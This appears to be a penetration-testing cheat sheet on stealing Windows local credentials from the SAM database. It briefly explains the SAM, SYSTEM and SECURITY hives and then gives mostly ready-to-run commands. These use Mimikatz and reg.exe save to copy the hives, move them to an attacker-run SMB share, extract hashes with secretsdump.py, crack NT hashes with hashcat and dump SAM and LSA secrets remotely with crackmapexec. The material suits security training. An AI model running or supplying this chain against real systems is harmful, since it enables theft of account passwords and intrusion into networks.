Attacking SAM
Copying SAM Registry Hives
There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below:
Registry Hive
Description
hklm\sam
Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system
Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.
hklm\security
Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.
Dumping SAM with Mimikatz
lsadump::sam
Using reg.exe save to Copy Registry Hives
reg.exe save hklm\\sam C:\\sam.save
reg.exe save hklm\\system C:\\system.save
reg.exe save hklm\\security C:\\security.save
# Send the saved files to our system
# start smbserver
smbserver.py -smb2support share .
# In Target Windows host
move sam.save \\\\ip\\share
move system.save \\\\ip\\share
move security.save \\\\ip\\share
Dumping Hashes with Impacket's secretsdump.py
# Dumping Hashes using transfered files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Cracking Hashes with Hashcat
# Store nthashes to a .txt File
(uid:rid:lmhash:nthash) <-- last part is nthash
# Cracking nt hashes using hashcat
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
Remote Dumping & LSA Secrets Considerations
Dumping LSA Secrets Remotely
crackmapexec smb ip --local-auth -u eren -p pass --lsa
Dumping SAM Remotely
crackmapexec smb ip --local-auth -u eren -p pass --sam
Last updated